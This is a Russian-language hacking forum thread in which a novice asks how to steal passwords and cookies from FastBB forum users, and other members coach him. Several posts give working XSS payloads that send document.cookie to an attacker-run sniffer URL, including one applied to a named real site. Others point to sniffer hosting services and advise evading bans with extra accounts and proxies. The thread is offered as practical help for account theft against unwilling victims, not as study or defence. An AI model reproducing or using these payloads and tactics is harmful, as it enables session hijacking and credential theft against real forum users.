Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!

Привет, пацан
Принцип работы: http://ru.wikipedia.org/wiki/Sniffer
Как правильно пользоваться: анализировать сетевой траффик.
Правду ли тебе сказали: Да, правду.
Читай тут http://old.antichat.ru/sniff/

Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!
Ну во первых ты выкладываешь не открытую ссылку на снифер а скрытую её в xss. Если XSS активная то любому пользователю достаточно просто прочитать сообщение чтобы хэш пришол на снифер. На снифер приходят все паоли от любых форумов самое главное составить правильно XSS большинство на снифер приходят пароли в зашифрованом виде типа md5 который потом можно расшифровать получив пароль из него.

Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил:

]

но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить?

1) форум скажи какой
2) возможна эта хсс не под эту версию форума

Не судьба, значит. Ты этого просто не очень сильно хочешь.

Я просто не очень сильно знаю. Форум FastBB ( На Borda.ru )

А еще одно: может кто-то обьяснить чайнику как пользоваться ScoopLm

Форум FastBB ( На Borda.ru )бронированный форум. Даже не думай :)

Вот тебе на, бронированный форум. Ну неужели ничего не можна сделать. Так давайте все по порядку. Пароли на FastBB храняться в открытом виде, это все знают, мне не нужна активная XSS мне и пассивной было бы вполне достаточно. Пожалуйста, мужики, подскажите где можна захомутать сниффера??? Век буду признателен!

http://antichat.org/sniffer

Спасибо конечно что откликнулся, я этот сниффер видел уже, но легкомысленность ламерской души не имеет предела. Дело в том, что я не умею им пользоваться. Допустим я сделал сниффер с логином bla-bla. Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php. Но я не пойму, какую ссылку мне жертве показывать надобно, а по какой самому заходить? Может кто не матернеться мышленно, да потратить на мою маленькую персону минуту времени???

Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php.
По этой ссылке у тебя будут отчеты снифера!
А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;

тебе надо заходить на http://antichat.org/s/bla-bla/log.php, а жертве http://antichat.org/s/bla-blaю.gif, нотак ты увидишь только его IP а что б стірить кукисі читай темі про XSS

Pashahak

Сразу на фастбб лезть - это жестоко =)
Потренировался бы на более уязвимых...
Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...

По этой ссылке у тебя будут отчеты снифера!
А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;

Что-то я не понимаю, при чем та ссылка именно к моему снифферу зарегеному, и как вообще инфо отправиться на мой сниффер bla-bla если в ней нету и намека на него?

Pashahak

Сразу на фастбб лезть - это жестоко =)
Потренировался бы на более уязвимых...
Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...

Тьху мля как дела плохи, действительно, нус, что ж, мож кто прямую ссылочку на XSS для фастББ даст тупому ламеру?

Пацаны, а допустим есть XSS http://www.neora.ru/anketa/index.php?latter="><script>alert()</script> как ее перекрутить чтоб кукисы украсть с помощью высше описанного сниффера ( тут мне ничего не нужно, я только принцип узнать хочу ) Заранее спасибо.

По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;

<script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>

По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;
Вот за это большущее спасибо

<script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>
И тебе не меньше

Супер-хакеры, а возможно пассивной Xss выманить не только айпишник но и кукисы. И еще, может кто-нибуть скажет мне, - есть програмка брутфорс для фастББ?

Я далеко не супер-хакер, но отвечу на твой вопрос =)
С помощью пассивной хсс куки стырить можно. Та хсс, что ты показывал - это и есть пассивная. Смотри внимательней на запрос...
...+document.cookie
Короче то, что мы тебе с goffog сказали - это и тырит куки =)

ЗЫ Насчет брута - честно не знаю. Думаю почту побыстрей будет брутить ;)

а в фастББ значит ета Xss тоже стырит кука? Ели так, то я ОРУ от радости!

По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;
То есть запрос будет таков "><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;</script>

А вот если я хочу угнать куку с форума www.qwert.borda.ru то запрос мне нужно писать в таблицу
вот прямо так www.qwert.borda.ru/index.php/"><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;</script> если что не правильно поправте

Гм, ты сказал поправить?.. Если бы все было так просто...
Почитай хотябы пару статей ачатовских про хсс, а то, я вижу, у тебя и представления нету об этом.
Коротко : XSS надо уметь внедрить. Вся суть заключается в том, что вредоносный код внедряется в код страницы, которую запрашивает жертва. Но для этого в фастбб ты должен найти уязвимое место, которое позволило бы это сделать. А вот когда найдешь уже все это дело, то тогда уже и строй запрос к сниферу. Для проверки юзай следующий код :
"><script>alert()</script>
Оно должно выдать алерт. В простонародии - окошко. =)

Я с фастББ не знаком но думаю там тоже есть предварительный просмотр, тоесть смотришь теме что ниже, малехо изменяешь под себя скрипт, заливаешь куда-то и всовуешь жертве. Но админы быстренько все просекут и дадут БАН по АЙПИ, так что зареги по-больше акков и юзай прокси.

goffog, слух, если не уверен, лучше не писать, а то в заблуждение некотыре входят ;)
Кстати на фастбб применяется супербан.
И насчет предварительного просмотра - если он есть, то форум уязвим? :D ;)

Ну если супербан, то даже программка есть для его обхода, а как я понял, предварительный просмотр, если и есть, то можно стырить куки, а про уязвимости форума я ниче не говорил.

Предварительный просмотр - это просто такая функция, котрорую в любой момент можно доработать и добавить фильтрацию символов... Если все переменные перед предварительным просмотром отфильтровались, то вот и облом, а на фастбб 150 тыщ процентов баги такого рода устранили. Там глубоко копать надо...

Почему такая уверенность? ИПБ не такой фуфлыжний форум, что б на нем такая бага была а на фастбб нет... И если на фастбб это работает, то принцип тотже.

Подумай сколько людей ежедневно приходят ломануть фастбб... =)
ЗЫ пхпбб круче ипб? Нет? Ну так на нем этой баги нету.
А вобще оффтопим мы тут с тобой... Короче если че, в ПМ или асю.

Приветствую.
Скорее всего не туда,но раз тематика данного топа подходит по смыслу моего сообщения, не примену воспользоваться сим обстоятельством :)
Обьясните пожалуйста несведущему, до сих пор ли работает он лайн сниффер на ачате, т.к. разногласий на эту тему не мало.
С ув. ThreeD

У кого был, работает. Только было так http://antichat.ru/s/[ваш логин]/log.php
а стало так http://old.antichat.ru/s/[ваш логин]/log.php.
А новый регнуть не даёт. Скорее всего связано с перенесением сайта на old.antichat

Пассивный XSS - жертва должна кликнуть. (Изя, смотри какие помидоры)
Активный - достаточно просто загрузить страницу со криптом. (Нихyясе помидоры!)
Есть разница?
А вобще, что это за фигня? Тут вопрос не уязвимостей форумов, а принципа работы скрипта.
Модеры спят?

По поводу принципа работы сниффера и http сниффера можно всё узнать здесь, аж три части инфы http://www1.hut.ru/aneksniff/ (http://www1.hut.ru/aneksniff)
Там же и сам сниффер выложен.